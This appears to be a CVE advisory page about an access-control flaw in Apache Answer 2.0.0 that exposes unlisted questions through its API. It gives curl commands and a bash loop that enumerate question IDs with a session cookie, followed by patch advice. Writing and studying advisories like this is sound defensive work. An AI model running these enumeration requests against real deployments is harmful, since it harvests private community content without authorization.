Listen to this Post
The vulnerability exists in Apache Answer versions up to and including 2.0.0. The core issue lies in the “unlisted question” feature, which is intended to hide questions from public listing but still allow access via direct links or to authorized users. However, the backend API endpoints that serve these unlisted questions did not implement proper access control checks. An authenticated attacker (any logged-in user with a valid session) can directly call specific REST API endpoints that return metadata and content for unlisted questions. The flawed endpoints include those that fetch question details, answers, comments, and revision history. Because the API only verifies that the user is authenticated—not whether that user is the owner or a permitted viewer of the unlisted question—the attacker can enumerate question IDs (which are often sequential or predictable) and retrieve sensitive information. For example, by issuing a GET request to `/api/v1/questions/{id}` for an unlisted question, the server responds with the full question body, answers, and comments. Similarly, the revision history endpoint exposes previous edits, potentially leaking draft content or deleted information. The attack does not require elevated privileges; any authenticated user can exploit this. The issue was fixed in version 2.0.1 by adding ownership and permission checks to all API routes handling unlisted content.
DailyCVE Form:
Platform: Apache Answer
Version: through 2.0.0
Vulnerability: Unlisted question access
Severity: Medium (CVSS)
Date: 9 June 2026
Prediction: 9 June 2026
What Undercode Say:
List all questions (including unlisted) by brute-forcing IDs
for id in {1..1000}; do
curl -s -X GET "https://target.example.com/api/v1/questions/$id" \
-H "Cookie: session=YOUR_SESSION_COOKIE" \
-H "X-Requested-With: XMLHttpRequest" | grep -q "unlisted" && echo "Found unlisted question ID: $id"
done
Directly fetch answers and comments of an unlisted question
curl -s -X GET "https://target.example.com/api/v1/questions/42/answers" \
-H "Cookie: session=YOUR_SESSION_COOKIE"
Access revision history (leaks previous edits)
curl -s -X GET "https://target.example.com/api/v1/questions/42/revisions" \
-H "Cookie: session=YOUR_SESSION_COOKIE"
Exploit:
An authenticated attacker sends crafted GET requests to /api/v1/questions/{id}, /api/v1/questions/{id}/answers, /api/v1/questions/{id}/comments, and `/api/v1/questions/{id}/revisions` for any numeric question ID. The server returns full data for unlisted questions without verifying the requesting user’s relationship to the question. Attackers can automate ID enumeration to harvest all unlisted content across the platform.
Protection:
Upgrade to Apache Answer version 2.0.1 or later. If immediate upgrade is not possible, apply a Web Application Firewall (WAF) rule to block API requests to `/api/v1/questions/` from non-owner users, or manually patch the permission middleware to enforce `question.visibility` checks on all API endpoints.
Impact:
Confidentiality breach of unlisted questions, answers, comments, and revision history. An attacker can read sensitive internal discussions, draft content, and deleted revisions. The vulnerability violates the platform’s privacy model and can lead to data leakage in private communities or enterprise deployments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
